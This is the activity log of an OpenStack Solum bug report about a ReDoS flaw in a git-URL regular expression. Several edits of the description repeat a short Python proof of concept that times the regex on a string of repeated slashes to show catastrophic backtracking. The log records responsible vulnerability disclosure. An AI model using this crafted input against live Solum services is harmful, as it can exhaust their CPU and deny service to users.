Solum

  1. Bug #2047505
  2. Activity log

Activity log for bug #2047505

Date Who What changed Old value New value Message
2023-12-27 08:05:14 lujiefsi bug added bug
2023-12-27 08:12:28 lujiefsi description see redos at https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS poc is here: ``` # ./openstack/solum/solum/api/handlers/common.py #22 import re import datetime pt = re.compile(r'^(http://|https://|git@)(.+)(/|:/)(.+)(.+)(\.git)') def split(x): data = 'https://git' + '/' * x starttime = datetime.datetime.now() pt.search(data) endtime = datetime.datetime.now() print ("string length = " + str(x) + " time cost=" + str((endtime - starttime).seconds) + " seconds") split(3) split(30) split(300) split(3000) ``` Please check this website( https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) for the basic concept of redos. vulnerable regex is at https://github.com/openstack/solum/blob/42575ef1316983e4d48b89ecf9d8a71e899f18db/solum/api/handlers/language_pack_handler.py#L104 poc is here: ``` # ./openstack/solum/solum/api/handlers/common.py #22 import re import datetime pt = re.compile(r'^(http://|https://|git@)(.+)(/|:/)(.+)(.+)(\.git)') def split(x):   data = 'https://git' + '/' * x   starttime = datetime.datetime.now()   pt.search(data)   endtime = datetime.datetime.now()   print ("string length = " + str(x) + " time cost=" + str((endtime - starttime).seconds) + " seconds") split(3) split(30) split(300) split(3000) ```
2023-12-29 14:43:18 lujiefsi summary Redos in https://github.com/openstack/solum/blob/42575ef1316983e4d48b89ecf9d8a71e899f18db/solum/api/handlers/language_pack_handler.py#L104 Redos in at language_pack_handler.py#L104
2023-12-29 14:43:40 lujiefsi description Please check this website( https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) for the basic concept of redos. vulnerable regex is at https://github.com/openstack/solum/blob/42575ef1316983e4d48b89ecf9d8a71e899f18db/solum/api/handlers/language_pack_handler.py#L104 poc is here: ``` # ./openstack/solum/solum/api/handlers/common.py #22 import re import datetime pt = re.compile(r'^(http://|https://|git@)(.+)(/|:/)(.+)(.+)(\.git)') def split(x):   data = 'https://git' + '/' * x   starttime = datetime.datetime.now()   pt.search(data)   endtime = datetime.datetime.now()   print ("string length = " + str(x) + " time cost=" + str((endtime - starttime).seconds) + " seconds") split(3) split(30) split(300) split(3000) ``` Please check this website( https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) for the basic concept of redos. vulnerable regex is at https://github.com/openstack/solum/blob/42575ef1316983e4d48b89ecf9d8a71e899f18db/solum/api/handlers/language_pack_handler.py#L104 poc is here: ``` import re import datetime pt = re.compile(r'^(http://|https://|git@)(.+)(/|:/)(.+)(.+)(\.git)') def split(x):   data = 'https://git' + '/' * x   starttime = datetime.datetime.now()   pt.search(data)   endtime = datetime.datetime.now()   print ("string length = " + str(x) + " time cost=" + str((endtime - starttime).seconds) + " seconds") split(3) split(30) split(300) split(3000) ```
2023-12-29 14:45:04 lujiefsi summary Redos in at language_pack_handler.py#L104 Redos in at common.py#L20
2023-12-29 14:45:06 lujiefsi description Please check this website( https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) for the basic concept of redos. vulnerable regex is at https://github.com/openstack/solum/blob/42575ef1316983e4d48b89ecf9d8a71e899f18db/solum/api/handlers/language_pack_handler.py#L104 poc is here: ``` import re import datetime pt = re.compile(r'^(http://|https://|git@)(.+)(/|:/)(.+)(.+)(\.git)') def split(x):   data = 'https://git' + '/' * x   starttime = datetime.datetime.now()   pt.search(data)   endtime = datetime.datetime.now()   print ("string length = " + str(x) + " time cost=" + str((endtime - starttime).seconds) + " seconds") split(3) split(30) split(300) split(3000) ``` Please check this website( https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) for the basic concept of redos. vulnerable regex is at https://github.com/openstack/solum/blob/42575ef1316983e4d48b89ecf9d8a71e899f18db/solum/api/handlers/common.py#L20 poc is here: ``` import re import datetime pt = re.compile(r'^(http://|https://|git@)(.+)(/|:/)(.+)(.+)(\.git)') def split(x):   data = 'https://git' + '/' * x   starttime = datetime.datetime.now()   pt.search(data)   endtime = datetime.datetime.now()   print ("string length = " + str(x) + " time cost=" + str((endtime - starttime).seconds) + " seconds") split(3) split(30) split(300) split(3000) ```
2024-01-22 04:13:52 lujiefsi information type Private Security Public Security